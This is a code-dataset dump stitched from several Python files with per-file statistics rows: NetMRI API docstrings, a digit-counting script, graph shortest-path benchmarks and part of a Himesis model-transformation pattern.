:param op_DeviceObjectID: The operator to apply to the field DeviceObjectID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceObjectID: The internal NetMRI identifier for this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceObjectID: If op_DeviceObjectID is specified, the field named in this input will be compared to the value in DeviceObjectID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceObjectID must be specified if op_DeviceObjectID is specified.
:type val_f_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceObjectID: If op_DeviceObjectID is specified, this value will be compared to the value in DeviceObjectID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceObjectID must be specified if op_DeviceObjectID is specified.
:type val_c_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjArtificialInd: The operator to apply to the field ObjArtificialInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjArtificialInd: Flag indicating this object network does not exist in the device configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjArtificialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjArtificialInd: If op_ObjArtificialInd is specified, the field named in this input will be compared to the value in ObjArtificialInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjArtificialInd must be specified if op_ObjArtificialInd is specified.
:type val_f_ObjArtificialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjArtificialInd: If op_ObjArtificialInd is specified, this value will be compared to the value in ObjArtificialInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjArtificialInd must be specified if op_ObjArtificialInd is specified.
:type val_c_ObjArtificialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjChangedCols: The operator to apply to the field ObjChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjChangedCols: If op_ObjChangedCols is specified, the field named in this input will be compared to the value in ObjChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjChangedCols must be specified if op_ObjChangedCols is specified.
:type val_f_ObjChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjChangedCols: If op_ObjChangedCols is specified, this value will be compared to the value in ObjChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjChangedCols must be specified if op_ObjChangedCols is specified.
:type val_c_ObjChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjConfigText: The operator to apply to the field ObjConfigText. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjConfigText: Original text of the definition of his network object in the device configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjConfigText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjConfigText: If op_ObjConfigText is specified, the field named in this input will be compared to the value in ObjConfigText using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjConfigText must be specified if op_ObjConfigText is specified.
:type val_f_ObjConfigText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjConfigText: If op_ObjConfigText is specified, this value will be compared to the value in ObjConfigText using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjConfigText must be specified if op_ObjConfigText is specified.
:type val_c_ObjConfigText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjEndTime: The operator to apply to the field ObjEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjEndTime: If op_ObjEndTime is specified, the field named in this input will be compared to the value in ObjEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjEndTime must be specified if op_ObjEndTime is specified.
:type val_f_ObjEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjEndTime: If op_ObjEndTime is specified, this value will be compared to the value in ObjEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjEndTime must be specified if op_ObjEndTime is specified.
:type val_c_ObjEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjFirstSeenTime: The operator to apply to the field ObjFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjFirstSeenTime: The timestamp of when NetMRI first discovered this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjFirstSeenTime: If op_ObjFirstSeenTime is specified, the field named in this input will be compared to the value in ObjFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjFirstSeenTime must be specified if op_ObjFirstSeenTime is specified.
:type val_f_ObjFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjFirstSeenTime: If op_ObjFirstSeenTime is specified, this value will be compared to the value in ObjFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjFirstSeenTime must be specified if op_ObjFirstSeenTime is specified.
:type val_c_ObjFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjName: The operator to apply to the field ObjName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjName: Name of this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjName: If op_ObjName is specified, the field named in this input will be compared to the value in ObjName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjName must be specified if op_ObjName is specified.
:type val_f_ObjName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjName: If op_ObjName is specified, this value will be compared to the value in ObjName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjName must be specified if op_ObjName is specified.
:type val_c_ObjName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjProvisionData: The operator to apply to the field ObjProvisionData. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjProvisionData: Internal data - do not modify, may change without warning. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjProvisionData: If op_ObjProvisionData is specified, the field named in this input will be compared to the value in ObjProvisionData using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjProvisionData must be specified if op_ObjProvisionData is specified.
:type val_f_ObjProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjProvisionData: If op_ObjProvisionData is specified, this value will be compared to the value in ObjProvisionData using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjProvisionData must be specified if op_ObjProvisionData is specified.
:type val_c_ObjProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjStartTime: The operator to apply to the field ObjStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjStartTime: If op_ObjStartTime is specified, the field named in this input will be compared to the value in ObjStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjStartTime must be specified if op_ObjStartTime is specified.
:type val_f_ObjStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjStartTime: If op_ObjStartTime is specified, this value will be compared to the value in ObjStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjStartTime must be specified if op_ObjStartTime is specified.
:type val_c_ObjStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjTimestamp: The operator to apply to the field ObjTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjTimestamp: If op_ObjTimestamp is specified, the field named in this input will be compared to the value in ObjTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjTimestamp must be specified if op_ObjTimestamp is specified.
:type val_f_ObjTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjTimestamp: If op_ObjTimestamp is specified, this value will be compared to the value in ObjTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjTimestamp must be specified if op_ObjTimestamp is specified.
:type val_c_ObjTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ObjUseCount: The operator to apply to the field ObjUseCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ObjUseCount: Total count of usage of this network by other elements of the configuration (rules, other network objects). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ObjUseCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ObjUseCount: If op_ObjUseCount is specified, the field named in this input will be compared to the value in ObjUseCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ObjUseCount must be specified if op_ObjUseCount is specified.
:type val_f_ObjUseCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ObjUseCount: If op_ObjUseCount is specified, this value will be compared to the value in ObjUseCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ObjUseCount must be specified if op_ObjUseCount is specified.
:type val_c_ObjUseCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device objects as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device object methods. The listed methods will be called on each device object returned and included in the output. Available methods are: device_cfg_context, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_cfg_context, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceObjectID
:param sort: The data field(s) to use for sorting the output. Default is DeviceObjectID. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceObject. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_objects: An array of the DeviceObject objects that match the specified input criteria.
:rtype device_objects: Array of DeviceObject
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The collector NetMRI that collected this data record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for this network object.
:type DeviceObjectID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The collector NetMRI that collected this data record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def device_cfg_context(self, **kwargs):
"""The configuration context to which this network object belongs.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for this network object.
:type DeviceObjectID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The configuration context to which this network object belongs.
:rtype : DeviceCfgContext
"""
return self.api_request(self._get_method_fullname("device_cfg_context"), kwargs)
def device(self, **kwargs):
"""The device from which this data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for this network object.
:type DeviceObjectID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this data was collected.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
def to_detail(self, **kwargs):
"""Returns the deail for an object.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param object_id: None
:type object_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param view: 0=tostring, 1=tooltip, 2-popup
:type view: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return detail: None
:rtype detail: String
"""
return self.api_request(self._get_method_fullname("to_detail"), kwargs)
| 53.400204
| 618
| 0.616259
| 6,340
| 52,439
| 5.042114
| 0.050158
| 0.069447
| 0.04514
| 0.05903
| 0.933619
| 0.932368
| 0.906122
| 0.892608
| 0.88094
| 0.873338
| 0
| 0.003197
| 0.302103
| 52,439
| 981
| 619
| 53.454638
| 0.87029
| 0.819981
| 0
| 0
| 0
| 0
| 0.06981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.421053
| false
| 0
| 0.052632
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
21d6c34b6830cfa0581ea49990016750c6f5c256
| 120
|
py
|
Python
|
_Massanori_Lists/lista_1/exe_11.py
|
M3nin0/supreme-broccoli
|
186c1ea3b839ba3139f9301660dec8fbd27a162e
|
[
"Apache-2.0"
] | null | null | null |
_Massanori_Lists/lista_1/exe_11.py
|
M3nin0/supreme-broccoli
|
186c1ea3b839ba3139f9301660dec8fbd27a162e
|
[
"Apache-2.0"
] | null | null | null |
_Massanori_Lists/lista_1/exe_11.py
|
M3nin0/supreme-broccoli
|
186c1ea3b839ba3139f9301660dec8fbd27a162e
|
[
"Apache-2.0"
] | null | null | null |
# Calculando os digitos de 2 ** 1000000
print ("Na elevação de 2 ** 1000000, existem ",len(str(2**1000000)),"digitos")
| 30
| 78
| 0.683333
| 18
| 120
| 4.555556
| 0.666667
| 0.292683
| 0.243902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 0.15
| 120
| 3
| 79
| 40
| 0.568627
| 0.308333
| 0
| 0
| 0
| 0
| 0.54321
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
1d047e03d7c5c512bdfe267e87a7b24f4d525cc3
| 5,401
|
py
|
Python
|
src/zen/benchmarks/shortest_path.py
|
wangyiranamy/Testing
|
2a729d1f73b6df69150807b965b8fedbb7661c04
|
[
"BSD-3-Clause"
] | 41
|
2015-01-13T19:49:50.000Z
|
2021-05-02T04:11:19.000Z
|
src/zen/benchmarks/shortest_path.py
|
wangyiranamy/Testing
|
2a729d1f73b6df69150807b965b8fedbb7661c04
|
[
"BSD-3-Clause"
] | 9
|
2015-01-28T10:46:27.000Z
|
2022-03-12T06:32:39.000Z
|
src/zen/benchmarks/shortest_path.py
|
wangyiranamy/Testing
|
2a729d1f73b6df69150807b965b8fedbb7661c04
|
[
"BSD-3-Clause"
] | 19
|
2015-01-27T12:19:42.000Z
|
2019-07-20T21:30:56.000Z
|
from zen.util.benchmark import Benchmark
import networkx as nx
import zen as zn
import igraph as ig
import random
class AllPairsBenchmark(Benchmark):
def __init__(self):
Benchmark.__init__(self,'All Pairs Comparison')
self.NUM_NODES = 200
self.NUM_SOURCES = 20
self.P = 0.05
def setup(self):
# build an ER network
self.ER_G = zn.Graph()
for i in range(self.NUM_NODES):
self.ER_G.add_node(i)
# add edges
for i in range(self.NUM_NODES):
for j in range(i+1,self.NUM_NODES):
if random.random() < self.P:
self.ER_G.add_edge_(i,j)
def bm_floyd_warshall(self):
zn.floyd_warshall_path_length_(self.ER_G)
def bm_apsp(self):
zn.all_pairs_shortest_path_length_(self.ER_G)
def bm_apsp_dijkstra(self):
zn.all_pairs_dijkstra_path_length_(self.ER_G)
class UUERSSSPBenchmark(Benchmark):
def __init__(self):
Benchmark.__init__(self,'Unweighted SSSP')
self.NUM_NODES = 200
self.NUM_SOURCES = 20
self.P = 0.05
def setup(self):
# build an ER network
self.ER_G = zn.Graph()
for i in range(self.NUM_NODES):
self.ER_G.add_node(i)
# add edges
for i in range(self.NUM_NODES):
for j in range(i+1,self.NUM_NODES):
if random.random() < self.P:
self.ER_G.add_edge_(i,j)
# generate some endpoints
self.sources = random.sample(range(self.NUM_NODES),self.NUM_SOURCES)
def bm_zen(self):
for i in self.sources:
zn.single_source_shortest_path(self.ER_G, i)
def bm_zenopt(self):
for i in self.sources:
zn.single_source_shortest_path_(self.ER_G, i)
def setup_networkx(self):
self.nx_ER_G = nx.Graph()
for i in self.ER_G.nodes_iter():
self.nx_ER_G.add_node(i)
for i,j in self.ER_G.edges_iter():
self.nx_ER_G.add_edge(i,j)
def bm_networkx(self):
for i in self.sources:
nx.single_source_shortest_path(self.nx_ER_G, i)
def setup_igraph(self):
self.ig_ER_G = ig.Graph()
self.ig_ER_G.add_vertices(len(self.ER_G))
self.ig_ER_G.add_edges(self.ER_G.edges())
def bm_igraph(self):
for i in self.sources:
self.ig_ER_G.get_shortest_paths(i)
class UERDijkstraBenchmark(Benchmark):
def __init__(self):
Benchmark.__init__(self,'Dijkstra')
self.NUM_NODES = 200
self.NUM_SOURCES = 20
self.P = 0.05
def setup(self):
# build an ER network
self.ER_G = zn.Graph()
for i in range(self.NUM_NODES):
self.ER_G.add_node(i)
# add edges
for i in range(self.NUM_NODES):
for j in range(i+1,self.NUM_NODES):
if random.random() < self.P:
self.ER_G.add_edge_(i,j)
# generate some endpoints
self.sources = random.sample(range(self.NUM_NODES),self.NUM_SOURCES)
def bm_zen(self):
for i in self.sources:
zn.dijkstra_path(self.ER_G, i)
def bm_zenopt(self):
for i in self.sources:
zn.dijkstra_path_(self.ER_G, i)
def setup_networkx(self):
self.nx_ER_G = nx.Graph()
for i in self.ER_G.nodes_iter():
self.nx_ER_G.add_node(i)
for i,j in self.ER_G.edges_iter():
self.nx_ER_G.add_edge(i,j)
def bm_networkx(self):
for i in self.sources:
nx.single_source_dijkstra(self.nx_ER_G, i)
def setup_igraph(self):
self.ig_ER_G = ig.Graph()
self.ig_ER_G.add_vertices(len(self.ER_G))
self.ig_ER_G.add_edges(self.ER_G.edges())
def bm_igraph(self):
for i in self.sources:
self.ig_ER_G.get_shortest_paths(i)
class UERFloydWarshallBenchmark(Benchmark):
def __init__(self):
Benchmark.__init__(self,'Floyd-Warshall')
self.NUM_NODES = 200
self.NUM_SOURCES = 20
self.P = 0.05
def setup(self):
# build an ER network
self.ER_G = zn.Graph()
for i in range(self.NUM_NODES):
self.ER_G.add_node(i)
# add edges
for i in range(self.NUM_NODES):
for j in range(i+1,self.NUM_NODES):
if random.random() < self.P:
self.ER_G.add_edge_(i,j)
def bm_zen(self):
zn.floyd_warshall_path_length(self.ER_G)
def bm_zenopt(self):
zn.floyd_warshall_path_length_(self.ER_G)
def setup_networkx(self):
self.nx_ER_G = nx.Graph()
for i in self.ER_G.nodes_iter():
self.nx_ER_G.add_node(i)
for i,j in self.ER_G.edges_iter():
self.nx_ER_G.add_edge(i,j)
def bm_networkx(self):
nx.floyd_warshall(self.nx_ER_G)
def setup_igraph(self):
self.ig_ER_G = ig.Graph()
self.ig_ER_G.add_vertices(len(self.ER_G))
self.ig_ER_G.add_edges(self.ER_G.edges())
#def bm_igraph(self):
#pass
#self.ig_ER_G.shortest_paths()
class UUERAPSPBenchmark(Benchmark):
def __init__(self):
Benchmark.__init__(self,'Unweighted APSP')
self.NUM_NODES = 200
self.NUM_SOURCES = 20
self.P = 0.05
def setup(self):
# build an ER network
self.ER_G = zn.Graph()
for i in range(self.NUM_NODES):
self.ER_G.add_node(i)
# add edges
for i in range(self.NUM_NODES):
for j in range(i+1,self.NUM_NODES):
if random.random() < self.P:
self.ER_G.add_edge_(i,j)
def bm_zen(self):
zn.all_pairs_shortest_path_length(self.ER_G)
def bm_zenopt(self):
zn.all_pairs_shortest_path_length_(self.ER_G)
def setup_networkx(self):
self.nx_ER_G = nx.Graph()
for i in self.ER_G.nodes_iter():
self.nx_ER_G.add_node(i)
for i,j in self.ER_G.edges_iter():
self.nx_ER_G.add_edge(i,j)
def bm_networkx(self):
nx.all_pairs_shortest_path_length(self.nx_ER_G)
def setup_igraph(self):
self.ig_ER_G = ig.Graph()
self.ig_ER_G.add_vertices(len(self.ER_G))
self.ig_ER_G.add_edges(self.ER_G.edges())
def bm_igraph(self):
self.ig_ER_G.shortest_paths()
| 21.866397
| 70
| 0.704869
| 1,001
| 5,401
| 3.504496
| 0.072927
| 0.063284
| 0.083808
| 0.041049
| 0.90878
| 0.900513
| 0.880559
| 0.848917
| 0.81984
| 0.81984
| 0
| 0.010036
| 0.169783
| 5,401
| 247
| 71
| 21.866397
| 0.772302
| 0.046288
| 0
| 0.813665
| 0
| 0
| 0.014019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.223602
| false
| 0
| 0.031056
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0dffaaf950ecf964b1ebc985124bc2d1a13ddc8f
| 33,251
|
py
|
Python
|
UMLRT2Kiltera_MM/Properties/positive/Himesis/HExitpoint2procdefparTrue_CompleteLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
UMLRT2Kiltera_MM/Properties/positive/Himesis/HExitpoint2procdefparTrue_CompleteLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
UMLRT2Kiltera_MM/Properties/positive/Himesis/HExitpoint2procdefparTrue_CompleteLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import cPickle as pickle
from uuid import UUID
class HExitpoint2procdefparTrue_CompleteLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HExitpoint2procdefparTrue_CompleteLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HExitpoint2procdefparTrue_CompleteLHS, self).__init__(name='HExitpoint2procdefparTrue_CompleteLHS', num_nodes=16, edges=[])
# Add the edges
self.add_edges([(5, 0), (4, 0), (13, 1), (15, 1), (1, 6), (1, 4), (6, 2), (12, 2), (14, 2), (7, 3), (3, 14), (3, 15), (11, 5), (10, 12), (10, 13), (10, 7), (11, 8), (8, 9)])
# Set the graph attributes
self["mm__"] = pickle.loads("""(lp1
S'MT_pre__UMLRT2Kiltera_MM'
p2
aS'MoTifRule'
p3
a.""")
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = UUID('89f8bcc5-c4cb-4e6e-922e-50a03246e1b5')
# Set the node attributes
self.vs[0]["MT_subtypeMatching__"] = False
self.vs[0]["MT_pre__Type"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==Bool\u000a
p1
.""")
self.vs[0]["MT_label__"] = """isComposite"""
self.vs[0]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[0]["mm__"] = """MT_pre__Attribute"""
self.vs[0]["MT_pre__name"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==isComposite\u000a
p1
.""")
self.vs[0]["MT_dirty__"] = False
self.vs[0]["GUID__"] = UUID('4b228af6-1b8e-47ac-8a6a-e613c0896903')
self.vs[1]["MT_subtypeMatching__"] = False
self.vs[1]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
